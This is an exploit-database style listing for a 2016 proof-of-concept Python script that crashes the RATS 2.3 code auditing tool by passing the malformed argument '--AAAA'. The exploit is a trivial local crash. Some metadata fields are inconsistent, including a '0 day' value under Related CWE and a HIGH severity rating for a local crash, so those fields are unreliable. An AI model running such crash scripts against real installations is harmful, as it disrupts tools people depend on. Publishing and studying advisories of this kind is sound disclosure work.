POC RATS v2.3 Crash

vendor:

Rough Auditing Tool for Security

by:

David Silveiro

7,5

CVSS

HIGH

Crash

119

CWE

Product Name: Rough Auditing Tool for Security

Affected Version From: 2.3

Affected Version To: 2.3

Patch Exists: YES

Related CWE: 0 day

CPE: 2.3:RATS

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 14.04 LTS

2016

This exploit is a proof of concept for a crash vulnerability in RATS version 2.3. The exploit is triggered by running the command 'rats --AAAA' which causes the application to crash. The exploit was written by David Silveiro and tested on Ubuntu 14.04 LTS.

Mitigation:

Update to the latest version of RATS to patch the vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: RATS 2.3 Crash POC
# Date: 25th April 2016
# Exploit Author: David Silveiro
# Author Contact: twitter.com/david_silveiro
# Website: Xino.co.uk
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
# Version: RATS 2.3
# Tested on: Ubuntu 14.04 LTS
# CVE : 0 day

from shlex import split
from os import system


def crash():

    try:
        com = ('rats --AAAA')
        return system(com)
    
    except:
        print("Is RATS installed?")


def main():

    print("Author:   David Silveiro        ")
    print("Website:  Xino.co.uk            ")
    print("Title:    POC RATS v2.3 Crash \n")

    crash()


if __name__ == "__main__":
    main()